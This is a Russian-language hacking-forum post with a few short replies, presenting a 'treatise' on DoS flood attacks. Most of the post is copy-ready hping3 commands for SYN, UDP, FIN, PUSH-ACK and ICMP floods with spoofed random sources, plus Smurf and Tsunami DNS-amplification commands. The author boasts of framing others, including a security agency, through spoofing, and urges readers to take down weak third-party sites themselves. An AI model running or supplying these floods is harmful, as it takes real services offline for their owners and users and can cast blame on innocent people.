• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

  • Напоминаем, что 1 декабря стартует курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, активный фаззинг, уязвимости, пост-эксплуатация, инструментальные средства, Social Engeneering и многое другое. Подробнее ...

трактат о DoS-e | dos - flood attack

Ondrik8

Ondrik8

prodigy
08.11.2016
1 004
2 985
статья является ознакомительной!)) чего то захотелось мне такое написать!

Ягуар, Бро, не вздумай!))

Всем привет, решил я поделится с Вами этими методиками и инструментами ибо, зае..ли эти китайские услуги, СОДА ,Малышева, глисты для похудения и всякого рода ..уета)) Те люди у которых не установлен (или лень его натянуть на браузер) , они меня поймут и часто еще обращаются с просьбами положить сайты с педофилией(в луковице как правило) что я с успехом и делаю, где и Вам рекомендую оттачивать это "не легкое" ремесло..))
И так что же что такое DOS атака подробно Вы узнаете от меня в двух словах DOS - это когда она ведется от одной машины то есть один на один DDOS - это когда от 2-ух и более типо >BotNet Дедок, привет!))
И так начнем с классики с утилиты которая меня в свое время очень поразила своим функционалом (не скажу каким) смысл этой атаки есть таков, что можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию)) в общем веселая программа которая с успехом проводит на TCP -протокол соединения, а он как Вы знаете<-(наверное) обладает трехсторонним рукопожатием.

Код:
hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
Код:
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE


Код:
hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
Ну и старички помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.

трактат о DoS-e | dos - flood attack




TCP_FIN-флуд это если атакующий только атакует сервер без TCP-соединения, пакет FIN будет отброшен, но сервер все равно будет выделять некоторые ресурсы для просмотра пакета, чтобы предотвратить избыточность и в скором времени он ляжет

Код:
hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP
PUSH _ACK-флуд это если сервер раздразнить этим флудом, он может обидеться и ваще перестать всех обслуживать)

Код:
hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP


ICMP_IGMP-флуд это мало эффективная атака нужно проводить долго и не одному но все же укажу её, так это же трактат)

Код:
hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
SMURF-флуд это Злоумышленник выберет некоторые промежуточные сайты в качестве усилителей, а затем отправит огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель.

Код:
hping3 --icmp --spoof TARGET_IP BROADCAST_IP
С это утилитой пожалуй все, но представлю Вам еще один инструмент:

Tsunami - DNS Amplification Attack Tool - Он предназначен для исследования и тестирования ваших брандмауэров, а также IDS / IPS. Не думайте об использовании этого инструмента для атаки. Это очень дорого из-за низкой производительности. Эффект может отличаться в зависимости от ширины полосы, количества сеансов и размера обратной связи от запроса домена, а также от мощности инструмента. <<<-- это перевод от , но поверьте эта прожка достойна внимания!))

Код:
./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt
на , как без меня!? ! И дополню что полно в дистрибутиве 46 как видите.) на любой вкус и цвет.

трактат о DoS-e | dos - flood attack






Напутствие: "Применяйте такого рода атаки в благородных целях!" так как нормальный сервак Вам одному положить не удастся, а вот какой нить слабенький за пару долларов в месяц или вообще free, легко на которых как правило размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.. в общем Вы меня надеюсь услышали!)

Удачи!









 
Последнее редактирование:
ghost

ghost

YW1uZXNpYQo=
Gold Team
12.05.2016
1 535
3 089
Статья +
LOIC это да...
 
B

Breed

Заблокирован
18.06.2017
195
242
+++
Поразило. Напрочь...
Аллегория:
Вот шел себе, шел и думал, что много уже пройдено. Назад практически не оглядывался. А тут вдруг взглянул вперед и ужаснулся: да тут еще топать и топать!
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 004
2 985
Mr.SIP - это инструмент, разработанный для аудита и моделирования SIP-атак. Первоначально он был разработан для использования в академической работе, чтобы помочь в разработке новых DDoS-атак и защитных подходов на основе SIP, а затем в качестве идеи превратить его в полнофункциональный SIP-инструмент для тестирования проникновения, он был переработан в текущую версию.
Поток вызовов, созданный SIP-NES

трактат о DoS-e | dos - flood attack


 
  • Нравится
Реакции: Xars и Vertigo
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб